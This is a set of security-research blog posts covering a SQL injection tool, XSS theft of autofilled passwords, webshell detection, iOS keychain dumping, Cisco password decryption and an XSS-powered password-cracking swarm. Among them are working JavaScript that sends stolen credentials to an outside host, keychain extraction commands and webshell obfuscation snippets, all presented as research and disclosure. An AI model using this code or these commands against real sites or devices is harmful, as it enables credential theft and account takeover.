DEF CON 20 – Neohapsis New Tool BBQSQL to Make its Debut!

By Scott Behrens and Ben Toews

Ben and I have been grinding away on slides and code in preparation of our talk at DefCon 20.  Without letting all of the cats out of the bag, I wanted to take a second to provide a little more context into our talk and research before we present our new tools at the conference.

BBQSQL is a SQL injection framework specifically designed to be hyper fast, database agnostic, easy to setup, and easy to modify.  The tool is extremely effective at exploiting a particular type of SQL injection flaw known as blind/semi-blind SQL injection.  When doing application security assessments we often uncover SQL vulnerabilities that are difficult to exploit. While current tools have an enormous amount of capability, when you can’t seem to get them to work you are out of luck.  We frequently end up writing custom scripts to help aid in the tricky data extraction, but a lot of time is invested in developing, testing and debugging these scripts.

BBQSQL helps automate the process of exploiting tricky blind SQL injection.  We developed a very easy UI to help you setup all the requirements for your particular vulnerability and provide real time configuration checking to make sure your data looks right.  On top of being easy to use, it was designed using the event driven concurrency provided by Python’s gevent.  This allows BBQSQL to run much faster than existing single/multithreaded applications.

We will be going into greater detail on the benefits of this kind of concurrency during the talk. We also will talk a bit about character frequency analysis and some ways BBQSQL uses it to extract data faster.  Will be doing a demo too to show you how to use the UI as well as import and export attack configs.  Here are a few screenshots to get you excited!

BBQSQL User Interface

BBQSQL Performing Blind SQL Injection

If you come see the talk, we would love to hear your thoughts!

Abusing Password Managers with XSS

By Ben Toews

One common and effective mitigation against Cross-Site Scripting (XSS) is to set the HTTPOnly flag on session cookies. This will generally prevent an attacker from stealing users’ session cookies with XSS. There are ways of circumventing this (e.g. the HTTP TRACE method), but generally speaking, it is fairly effective. That being said, an attacker can still cause significant damage without being able to steal the session cookie.

A variety of client-side attacks are possible, but an attacker is also often able to circumvent Cross-Site Request Forgery (CSRF) protections via XSS and thereby submit various forms within the application. The worst case scenario with this type of attack would be that there is no confirmation for email address or password changes and the attacker can change users’ passwords. From an attacker’s perspective this is valuable, but not as valuable as being able to steal a user’s session. By reseting the password, the attacker is giving away his presence and the extent to which he is able to masquarade as another user is limited. While stealing the session cookie may be the most commonly cited method for hijacking user accounts, other means not involving changing user passwords exist.

All modern browsers come with some functionality to remember user passwords. Additionally, users will often install third-party applications to manage their passwords for them. All of these solutions save time for the user and generally help to prevent forgotten passwords. Third party password managers such as LastPass are also capable of generating strong, application specific passwords for users and then sending them off to the cloud for storage. Functionality such as this greatly improves the overall security of the username/password authentication model. By encouraging and facilitating the use of strong application specific passwords, users need not be as concerned with unreliable web applications that inadequately protect their data. For these and other reasons, password managers such as LastPass are generally considered within the security industry to be a good idea. I am a long time user of LastPass and have (almost) nothing but praise for their service.

An issue with both in-browser as well as third-party password managers that gets hardly any attention is how these can be abused by XSS. Because many of these password managers automatically fill login forms, an attacker can use JavaScript to read the contents of the form once it has been filled. The lack of attention this topic receives made me curious to see how exploitable it actually would be. For the purpose of testing, I built a simple PHP application with a functional login page aswell as a second page that is vulnerable to XSS (find them here). I then proceded to experiment with different JavaScript, attempting to steal user credentials with XSS from the following password managers:

  • LastPass (Current version as of April 2012)
  • Chrome (version 17)
  • Firefox (version 11)
  • Internet Explorer (version 9)

I first visited my login page and entered my password. If the password manager asked me if I wanted it to be remembered, I said yes. I then went to the XSS vulnerable page in my application and experimented with different JavaScript, attempting to access the credentials stored by the browser or password manager. I ended up writing some JavaScript that was effective against the password managers listed above with the exception of IE:

<script type="text/javascript">
    ex_username = '';
    ex_password = '';
    inter = '';
    function attack(){
        ex_username = document.getElementById('username').value;
        ex_password = document.getElementById('password').value;
        if(ex_username != '' | ex_password != ''){
            document.getElementById('xss').style.display = 'none'
            request=new XMLHttpRequest();
            url = "http://btoe.ws/pwxss?username="+ex_username+"&password="+ex_password;
            request.open("GET",url,true);
            request.send();
            document.getElementById('xss').style.visibility='hidden';
            window.clearInterval(inter);
        }
    }
    document.write("\
    <div id='xss'>\
    <form method='post' action='index.php'>\
    username:<input type='text' name='username' id='username' value='' autocomplete='on'>\
    password:<input type='password' name='password' id='password' value='' autocomplete='on'>\
    <input type='submit' name='login' value='Log In'>\
    </form>\
    </div>\
    ");
    inter = window.setInterval("attack()",100);
</script>

All that this code does it create a fake login form on the XSS vulnerable page and then wait for it to be filled in by the browser or password manager. When the fields are filled, the JavaScript takes the values and sends them off to another server via a simple Ajax request. At first I had attempted to harness the onchange event of the form fields, but it turns out that this is unreliable across browsers (also, LastPass seems to mangle the form and input field DOM elements for whatever reason). Using window.setInterval, while less elegant, is more effective.

If you want to try out the above code, go to http://boomer.neohapsis.com/pwxss and login (username:user1 password:secret). Then go to the reflections page and enter the slightly modified code listed there into the text box. If you told your password manager to remember the password for the site, you should see an alert  box with the credentials you previously entered. Please let me know if you find any vulns aside from XSS in this app.

To be honest, I was rather surprised that my simple trick worked in Chrome and Firefox. The LastPass plugin in the Chrome browser operates on the DOM level like any other Chrome plugin, meaning that it can’t bypass event listeners that are watching for form submissions. The browsers, on the other hand could put garbage into the form elements in the DOM and wait until after the onsubmit event has fired to put the real credentials into the form. This might break some web applications that take action based on the onchange event of the form inputs, but if that is a concern, I am sure that the browsers could somehow fill the form fields without triggering this event.

The reason why this code doesn’t work in IE (aside from the non-IE-friendly XHR request) is that the IE password manager doesn’t automatically fill in user credentials. IE also seems to be the only one of the bunch that ties a set of credentials to a specific page rather than to an entire domain. While these both may be inconveniences from a usability perspective, they (inadvertantly or otherwise) improve the security of the password manager.

While this is an attack vector that doesn’t get much attention, I think that it should. XSS is a common problem, and developers get an unrealistic sense of security from the HTTPOnly cookie flag. This flag is largely effective in preventing session hijacking, but user credentials may still be at risk. While I didn’t get a chance to check them out when researching this, I would not be surprised if Opera and Safari had the same types of behavior.

I would be interested to hear a discussion of possible mitigations for this vulnerability. If you are a browser or browser-plugin developer or just an ordinary hacker, leave a comment and let me know what you think.

Edit: Prompted by some of the comments, I wrote a little script to demo how you could replace the whole document.body with that of the login page and use push state to trick a user into thinking that they were on the login page. https://gist.github.com/2552844

NeoPI in the Wild

By Scott Behrens

NeoPI was a project developed by myself and Ben Hagen to aid in the detection of obfuscated and encrypted webshells.  I recently came across an article about Webacoo shell and a rewrite of this php backdoor to avoid detection from NeoPI.

Webacoo’s developer used a few interesting techniques to avoid detection.  The first technique was to avoid signature based detection by using the function ‘strrev’:

$b=strrev("edoced_4"."6esab")

This bypasses our traditional based signature detection and also lends to a few other techniques to bypass signature based detection.  Another webshell surfaced after NeoPI’s release that uses similar techniques to avoid signature based detection.  Another example could be the following (as seen in https://elrincondeseth.Wordpress.com/2011/08/17/bypasseando-neopi/):

$b = 'bas'.'e64'.'_de'.'code';

We can see that just by breaking up the word, the risk of detection is highly mitigated.  As I suggested at B-Sides, signature based detection is complimentary to the tests in NeoPI but by itself, ineffective.   These methods described above completely thwart this tests effectiveness.

But one thing these techniques must do at some point is actually eval the code.  Webacoo for example uses the following:

eval($b(str_replace(" ","","a W Y o a X …SNIP

By developing a regex that looks for eval and a variable holding the global function, we can flag this file as malicious.  After running this test against a WordPress server with Webacoo’s shell, I observed the following:

 

Figure 1 – Webacoo identified as suspicious in eval test

NeoPI was able to detect the function and flagged it as malicious.  This particular type of use of eval isn’t very common and I have really only seen it used in malware.  That being said functions.php was also flagged so I imagine this test can still have many false positives and should be used to help aid in manual investigation of the files identified.

Another tweak Webacoo’s developer did was insert spaces in-between each character of a base64 encoded string.  The function str_replace() is called to replace each space before the code is base64_decoded  and eval’d.

In order to thwart this particular obfuscation technique, I went ahead and modified the entropy function to strip spaces within the data the function is analyzing. The screenshot below shows a scan against 1752 php files in WordPress and shows the entropy test results as flagging webacoo as potentially malicious. This increased NeoPI’s effectiveness at detecting webacoo.php but is more of a stopgap solution as the attacker can craft other junk characters to lower the shells entropy and index of coincidence. Some additional thought and research is needed on potentially looking for these complicated search and replace functions to determine if the data being obfuscated is malicious.

 

Figure 2 – Test results after modifying entropy code results in higher entropy of webacoo.php

The latest version of the code can be checked out at http://github.com/Neohapsis/NeoPI which includes these enhancements.

As for improving the other tests effectiveness, I am looking into the possibility of identifying base64 encodings without looking for the function name.  This technique may be helpful by building a ratio of upper and lower case characters and seeing if there is a trend with files that use obfuscation.

If anyone has interesting techniques for defeating NeoPI please respond to this post and I’ll look at adding more detection mechanisms to this tool!

“Researchers steal iPhone passwords in 6 minutes”…true…but not the whole story

By Patrick Toomey

Direct link to keychaindumper (for those that want to skip the article and get straight to the code)

So, a few weeks ago a wave of articles hit the usual sites about research that came out of the Fraunhofer Institute (yes, the MP3 folks) regrading some issues found in Apple’s Keychain service.  The vast majority of the articles, while factually accurate, didn’t quite present the full details of what the researchers found.  What the researchers actually found was more nuanced than what was reported.  But, before we get to what they actually found, let’s bring everyone up to speed on Apple’s keychain service.

Apple’s keychain service is a library/API provided by Apple that developers can use to store sensitive information on an iOS device “securely” (a similar service is provided in Mac OS X).  The idea is that instead of storing sensitive information in plaintext configuration files, developers can leverage the keychain service to have the operating system store sensitive information securely on their behalf.  We’ll get into what is meant by “securely” in a minute, but at a high level the keychain encrypts (using a unique per-device key that cannot be exported off of the device) data stored in the keychain database and attempts to restrict which applications can access the stored data.  Each application on an iOS device has a unique “application-identifier” that is cryptographically signed into the application before being submitted to the Apple App store.  The keychain service restricts which data an application can access based on this identifier.  By default, applications can only access data associated with their own application-identifier.  Apple realized this was a bit restrictive, so they also created another mechanism that can be used to share data between applications by using “keychain-access-groups”.  As an example, a developer could release two distinct applications (each with their own application-identifier) and assign each of them a shared access group.  When writing/reading data to the keychain a developer can specify which access group to use.  By default, when no access group is specified, the application will use the unique application-identifier as the access group (thus limiting access to the application itself).  Ok, so that should be all we need to know about the Keychain.  If you want to dig a little deeper Apple has a good doc here.

Ok, so we know the keychain is basically a protected storage facility that the iOS kernel delegates read/write privileges to based on the cryptographic signature of each application.  These cryptographic signatures are known as “entitlements” in iOS parlance.  Essentially, an application must have the correct entitlement to access a given item in the keychain.  So, the most obvious way to go about attacking the keychain is to figure out a way to sign fake entitlements into an application (ok, patching the kernel would be another way to go, but that is a topic for another day).  As an example, if we can sign our application with the “apple” access group then we would be able to access any keychain item stored using this access group.  Hmmm…well, it just so happens that we can do exactly that with the “ldid” tool that is available in the Cydia repositories once you Jailbreak your iOS device.  When a user Jailbreak’s their phone, the portion of the kernel responsible for validating cryptographic signatures is patched so that any signature will validate. So, ldid basically allows you to sign an application using a bogus signature. But, because it is technically signed, a Jailbroken device will honor the signature as if it were from Apple itself.

Based on the above descrption, so long as we can determine all of the access groups that were used to store items in a user’s keychain, we should be able to dump all of them, sign our own application to be a member of all of them using ldid, and then be allowed access to every single keychain item in a user’s keychain.  So, how do we go about getting a list of all the access group entitlements we will need?  Well, the kechain is nothing more than a SQLite database stored in:

/var/Keychains/keychain-2.db

And, it turns out, the access group is stored with each item that is stored in the keychain database.  We can get a complete list of these groups with the following query:

SELECT DISTINCT agrp FROM genp

Once we have a list of all the access groups we just need to create an XML file that contains all of these groups and then sign our own application with ldid.  So, I created a tool that does exactly that called keychain_dumper.  You can first get a properly formatted XML document with all the entitlements you will need by doing the following:

./keychain_dumper -e > /var/tmp/entitlements.xml

You can then sign all of these entitlments into keychain_dumper itself (please note the lack of a space between the flag and the path argument):

ldid -S/var/tmp/entitlements.xml keychain_dumper

After that, you can dump all of the entries within the keychain:

./keychain_dumper

If all of the above worked you will see numerous entries that look similar to the following:

Service: Dropbox
Account: remote
Entitlement Group: R96HGCUQ8V.*
Label: Generic
Field: data
Keychain Data: SenSiTive_PassWorD_Here

Ok, so what does any of this have to do with what was being reported on a few weeks ago?  We basically just showed that you can in fact dump all of the keychain items using a jailbroken iOS device.  Here is where the discussion is more nuanced than what was reported.  The steps we took above will only dump the entire keychain on devices that have no PIN set or are currently unlocked.  If you set a PIN on your device, lock the device, and rerun the above steps, you will find that some keychain data items are returned, while others are not.  You will find a number of entries now look like this:

Service: Dropbox
Account: remote
Entitlement Group: R96HGCUQ8V.*
Label: Generic
Field: data
Keychain Data: <Not Accessible>

This fundamental point was either glossed over or simply ignored in every single article I happend to come across (I’m sure at least one person will find the article that does mention this point :-)).  This is an important point, as it completely reframes the discussion.  The way it was reported it looks like the point is to show how insecure iOS is.  In reality the point should have been to show how security is all about trading off various factors (security, convenience, etc).  This point was not lost on Apple, and the keychain allows developers to choose the appropriate level of security for their application.  Stealing a small section from the keychain document from Apple, they allow six levels of access for a given keychain item:

CFTypeRef kSecAttrAccessibleWhenUnlocked;
CFTypeRef kSecAttrAccessibleAfterFirstUnlock;
CFTypeRef kSecAttrAccessibleAlways;
CFTypeRef kSecAttrAccessibleWhenUnlockedThisDeviceOnly;
CFTypeRef kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly;
CFTypeRef kSecAttrAccessibleAlwaysThisDeviceOnly;

The names are pretty self descriptive, but the main thing to focus in on is the “WhenUnlocked” accessibility constants.  If a developer chooses the “WhenUnlocked” constant then the keychain item is encrypted using a cryptographic key that is created using the user’s PIN as well as the per-device key mentioned above.  In other words, if a device is locked, the cryptographic key material does not exist on the phone to decrypt the related keychain item.  Thus, when the device is locked, keychain_dumper, despite having the correct entitlements, does not have the ability to access keychain items stored using the “WhenUnlocked” constant.  We won’t talk about the “ThisDeviceOnly” constant, but it is basically the most strict security constant available for a keychain item, as it prevents the items from being backed up through iTunes (see the Apple docs for more detail).

If a developer does not specify an accessibility constant, a keychain item will use “kSecAttrAccessibleWhenUnlocked”, which makes the item available only when the device is unlocked.  In other words, applications that store items in the keychain using the default security settings would not have been leaked using the approach used by Fraunhofer and/or keychain_dumper (I assume we are both just using the Keychain API as it is documented).  That said, quite a few items appear to be set with “kSecAttrAccessibleAlways”.  Such items include wireless access point passwords, MS Exchange passwords, etc.  So, what was Apple thinking; why does Apple let developers choose among all these options?  Well, let’s use some pretty typical use cases to think about it.  A user boots their phone and they expect their device to connect to their wireless access point without intervention.  I guess that requires that iOS be able to retrieve their access point’s password regardless of whether the device is locked or not.  How about MS Exchange?  Let’s say I lost my iPhone on the subway this morning.  Once I get to work I let the system administrator know and they proceed to initiate a remote wipe of my Exchange data.  Oh, right, my device would have to be able to login to the Exchange server, even when locked, for that to work.  So, Apple is left in the position of having to balance the privacy of user’s data with a number of use cases where less privacy is potentially worthwhile.  We can probably go through each keychain item and debate whether Apple chose the right accessibility constant for each service, but I think the main point still stands.

Wow…that turned out to be way longer than I thought it would be.  Anyway, if you want to grab the code for keychain_dumper to reproduce the above steps yourself you can grab the code on github.  I’ve included the source as well as a binary just in case you don’t want/have the developer tools on your machine.  Hopefully this tool will be useful for security professionals that are trying to evaluate whether an application has chosen the appropriate accessibility parameters during blackbox assessments. Oh, and if you want to read the original paper by Fraunhofer you can find that here.

Java Cisco Group Password Decrypter

By Patrick Toomey

For whatever reason I have found myself needing to “decrypt” Cisco VPN client group passwords throughout the years.  I say “decrypt” , as the value is technically encrypted using 3DES, but the mechanism used to decrypt the value is largely obfuscative (the cryptographic key is included in the ciphertext).  As such, the encryption used is largely incidental, and any simplistic substitution cipher would have protected the group password equally well (think newspaper cryptogram).

I can’t pinpoint all the root reasons, but it seems as though every couple months I’m needing a group password decrypted.  Sometimes I am simply moving a Cisco VPN profile from Windows to Linux.  Other times I’ve been on a  client application assessments/penetrations test where I’ve needed to gain access to the plaintext group password.  Regardless, I inevitably find myself googling for “cisco group password decrypter”.  A few different results are returned.  The top result is always a link here.  This site has a simple web app that will decrypt the group password for you, though it occurs server-side.  Being paranoid by trade, I am always apprehensive sending information to a third party if that information is considered sensitive (whether by me, our IT department, or a client).  I have no reason to think the referenced site is malicious, but it would not be in my best interest professionally not to be paranoid security conscious, particularly with client information.  The referenced site has a link to the original source code, and one can feel free to download, audit, compile, and use the provided tool to perform all of the decryption client-side.  That said, the linked file depends on libgcrypt.  That is fine if I am sitting in Linux, but not as great if I am on some new Windows box (ok, maybe I’m one of the few who doesn’t keep libgcrypt at the ready on my fresh Windows installs).  I’ve googled around to see if anything exists that is more portable.  I found a few things, including a link to a Java applet, but the developer seems to have lost the source code…..  So, laziness won, and I decided it would be easier to spend 30 minutes to write my own cross-platform Java version than spend any more time on Google.

The code for the decrypter can be found on our github, here.  I am not a huge fan of Java GUI development, and thus leveraged the incredible GUI toolkit built in to NetBeans.  The referenced source code should compile cleanly in NetBeans if you want the GUI.  If you simply want to decrypt group passwords with no dependencies you can run a command line version by compiling the “GroupPasswordDecrypter” class file.  This file has zero dependencies on third-party libraries and should be sufficient for anyone that doesn’t feel compelled to use a GUI (me included).

As a quick example, I borrowed a sample encrypted group password from another server-side implementation .  The encrypted group password we would like to decrypt is

9196FE0075E359E6A2486905A1EFAE9A11D652B2C588EF3FBA15574237302B74C194EC7D0DD16645CB534D94CE85FEC4

Or, if you prefer the command line version

Hope it comes in handy!

Virtualization: When and where?

We often field questions from our clients regarding the risks associated with hypervisor / virtualization technology.  Ultimately the technology is still software, and still faces many of the same challenges any commercial software package faces, but there are definitely some areas worth noting.

The following thoughts are by no means a comprehensive overview of all issues, but they should provide the reader with a general foundation for thinking about virtualization-specific risks.

Generally speaking, virtual environments are not that different than physical environments.  They require much of the same care and feeding, but that’s the rub; most companies don’t do a good job of managing their physical environments, either.  Virtualization can simply make existing issues worse.

For example, if an organization doesn’t have a vulnerability management program that is effective at activities like asset identification, timely patching, maintaining the installed security technologies, change control, and system hardening, than the adoption of virtualization technology usually compounds the problem via increased “server sprawl.”  Systems become even easier to deploy which leads to more systems not being properly managed.

We often see these challenges creep up in a few scenarios:

Testing environments – Teams can get the system up and running very quickly using existing hardware.  Easy and fast…but also dirty. They often don’t take the time to harden the system or bring it up to current patch levels or install required security software.

Even in the scenarios where templates are used, with major OS vendors like Microsoft and RedHat coming out with security fixes on a monthly basis a template even 2 months old is out of date.

Rapid deployment of “utility” servers – Systems that run back-office services like mail servers, print servers, file servers, DNS servers, etc.  Often times nobody really does much custom work on them and because they can no longer be physically seen or “tripped over” in the data center they sometimes fly under the radar.

Development environments – We often see virtualization technology making inroads into companies with developers that need to spin-up and spin-down environments quickly to save time and money.  The same challenges apply; if the systems aren’t maintained (and they often aren’t – developers aren’t usually known for their attention to system administration tasks) they present great targets for the would-be attacker.  Even worse if the developers use sensitive data for testing purposes.  If properly isolated, there is less risk from what we’ve described above but that isolation has to be pretty well enforced and monitoring to really mitigate these risks.

There are also risks associated with vulnerabilities in the technology itself.  The often feared “guest break out” scenario where a virtual machine or “guest” is able to “break out” of it’s jail and take over the host (and therefore, access data in any of the other guests) is a common one, although we haven’t heard of any real-world exploitations of these defects…yet.  (Although the vulnerabilities are starting to become better understood)

There are also concerns about the hopping between security “zones” when it comes to compliance or data segregation requirement.  For example, typically a physical environment has a firewall and other security controls between a webserver and a database server.  In a virtual environment, if they are sharing the same host hardware, you typically can not put a firewall or intrusion detection device or data leakage control between them.  This could violate control mandates found in standards such as PCI in a credit card environment.

Even assuming there are no vulnerabilities in the hypervisor technology that allow for evil network games between hosts, when you house two virtual machines/guests on the same hypervisor/host you often lose the visibility of the network traffic between them.  So if your security relies on restricting or monitoring at the network level, you no longer have that ability.  Some vendors are working on solutions to resolve intra-host communication security but it’s not mature by any means.

Finally, the “many eggs in one basket” concern is still a factor; when you have 10, 20, 40 or more guest machines on a single piece of hardware that’s a lot of potential systems going down should there be a problem.  While the virtualization software vendors will certainly offer high availability scenarios with technology such as VMware’s “VMotion”, redundant hardware, the use of SANs, etc., the cost and complexity adds up fairly fast.  (And as we have seen from some rather nasty SAN failures the past two months, SANs aren’t always as failsafe as we have been lead to believe. You still have backups right?)

While in some situations the benefits of virtualization technology far outweigh the risks, there are certainly situations where existing non-virtualized architectures are better. The trick is finding that line in the midst of the hell mell towards virtualization.

–Tyler

Hacker Halted 2009

As many of you know, Greg Ose and I recently spoke at Hacker Halted 2009 in Miami. We discussed a distributed password cracker that we designed and implemented that utilizes redirected browsers to build a swarm of worker nodes. The method which we demonstrated can be implemented using large numbers of otherwise useless stored cross-site scripting vulnerabilities. The client-side worker was implemented as a Java applet in an injected iframe.

Greg and I also showed several methods which can be used on different platforms to trick the Java virtual machine into continuing execution after a client has closed the page where it is embedded. This can be used to maintain large numbers of workers even when the vulnerable sites are not visited for long periods of time.

The following video shows the administrative interface to DistCrypt where we can add and manage password hashes.

You can view the high quality version here.

You can also view the slides from our presentation on the Hacker Halted website here.